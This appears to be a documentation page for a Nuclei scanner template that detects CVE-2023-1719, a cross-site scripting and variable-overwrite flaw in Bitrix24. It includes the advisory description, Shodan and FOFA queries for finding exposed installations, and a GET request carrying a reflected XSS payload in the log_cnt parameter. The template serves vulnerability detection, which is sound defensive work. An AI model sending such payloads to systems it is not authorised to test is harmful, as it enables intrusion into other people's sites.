Bitrix Component - Cross-Site Scripting
ID: CVE-2023-1719
Severity: critical
Author: DhiyaneshDk
Tags: cve2023,cve,bitrix,xss,bitrix24
Description
Section titled “Description”Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.
YAML Source
Section titled “YAML Source”id: CVE-2023-1719
info: name: Bitrix Component - Cross-Site Scripting author: DhiyaneshDk severity: critical description: | Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables. reference: - https://starlabs.sg/advisories/23/23-1719/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1719 - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1719 cwe-id: CWE-665 epss-score: 0.02754 epss-percentile: 0.90563 cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: bitrix24 product: bitrix24 shodan-query: - html:"/bitrix/" - http.html:"/bitrix/" fofa-query: body="/bitrix/" tags: cve2023,cve,bitrix,xss,bitrix24
http: - method: GET path: - "{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"
matchers-condition: and matchers: - type: word part: body words: - "'LOG_CNT':" - "<img onerror=alert(document.domain) src=1>" condition: and
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a0047304502205519184ee6403eb0b514a9c084723dbf905f704cf325881a0c86a0f2d04d380b022100a4a2d0ebd27f3acf3a77f7bf0d11d91b7e0ec68e575342456a4dff03ec10bdcf:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-1719.yaml"